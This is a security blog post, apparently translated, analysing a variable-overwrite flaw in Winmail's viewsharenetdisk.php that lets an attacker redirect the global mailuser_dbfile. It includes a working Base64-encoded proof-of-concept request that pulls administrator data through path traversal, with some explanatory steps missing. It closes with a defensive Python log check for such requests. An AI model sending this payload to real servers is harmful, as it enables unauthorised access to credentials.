Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


Getshell analysis of the Winmail database overwrite (with PoC)

Posted by mitry at 2020-03-23

All global variables in Winmail are defined in ./inc/config.php. If a variable overwrite vulnerability exists, any global variable can be overwritten.

Requesting wap.php?dest=index calls the index.php file.

Look at index.php (located at ../wap/index.php).

In this code, the controllable variables are $logoimage and $f_domain: $logoimage controls the file suffix and the file content, and $f_domain controls the file name.

The result is a vulnerability that writes a file with a restricted suffix. The suffix is limited to JPG, GIF, PNG and the like, so you do not gain privileges from it.

In viewsharenetdisk.php

There is a variable overwrite vulnerability in the parse_str call. $f can be overwritten. It has to be Base64-encoded, and the variables that follow can be controlled at will because they are not reassigned.

Following the flow, $chknum and $itemcode have to pass verification. Both variables can be overwritten, but the MD5 value of userinfo is unknown.

Viewing userinfo on the Internet


In the SQL code, new SQLite is passed a variable.

Here $file is passed in from mailuser_dbfile. mailuser_dbfile is defined globally, so it can be overwritten at this point.


Download the administrator data:

viewsharenetdisk.php?userid=admin&f=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdllXUnRhVzUxYzJWeUxtTm1adz09Jml0ZW1jb2RlPTZhNzgzMTMzMjE5OGU0ZDU1NmQyYWY5ZDYxZWI4ZmIwJmNoa3N1bT1kYWI4YTQwN2JhMGFjOGRhYThhZjQyN2Q2NDU0OTQzZiZzdGFydD0xJm5ldGRpc2tfc2hhcmVfZXhwaXJlPTE0Nzk4NjU2OTMx
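
A log check for defenders, added here as an example and not part of the original post or of Winmail: it decodes the Base64 f parameter of viewsharenetdisk.php requests and flags inner keys that PHP would turn into a protected global such as mailuser_dbfile. It assumes f decodes to a query string (as the PoC value above does); the function names, the userid value alice and the PLACEHOLDER values are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, parse_qsl, quote, urlsplit

TARGET_SCRIPT = "viewsharenetdisk.php"
# Globals that must never be set from a request. mailuser_dbfile is the one the
# post names; adding the other names from your inc/config.php is an assumption.
PROTECTED_GLOBALS = {"mailuser_dbfile"}


def php_var_name(key):
    """Map a query key to the variable name PHP would create from it."""
    base = key.split("[", 1)[0].lstrip(" ")   # a[b]=c sets $a
    return re.sub(r"[ .]", "_", base)         # PHP turns dots/spaces into "_"


def inspect_request(url):
    """Return findings for one request URL; an empty list means nothing flagged."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return []
    findings = []
    for blob in parse_qs(parts.query).get("f", []):
        blob = blob.replace(" ", "+")         # parse_qs decoded a raw "+" as space
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:
            findings.append("f is not valid Base64")
            continue
        inner = raw.decode("utf-8", "replace")
        for key, _value in parse_qsl(inner, keep_blank_values=True):
            name = php_var_name(key)
            if name in PROTECTED_GLOBALS:
                findings.append("f overwrites global " + name)
    return findings


def sample_url(inner_query):
    """Build a constructed request line; all values are placeholders."""
    blob = base64.b64encode(inner_query.encode()).decode()
    return "/viewsharenetdisk.php?userid=alice&f=" + quote(blob, safe="")


if __name__ == "__main__":
    for q in ("opt=download&start=1",
              "mailuser_dbfile=PLACEHOLDER.db&opt=download",
              "mailuser.dbfile=PLACEHOLDER.db"):
        print(q, "->", inspect_request(sample_url(q)))
```

The name normalisation matters because PHP converts dots and spaces in incoming variable names to underscores, so a match on the literal string mailuser_dbfile alone would miss mailuser.dbfile.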
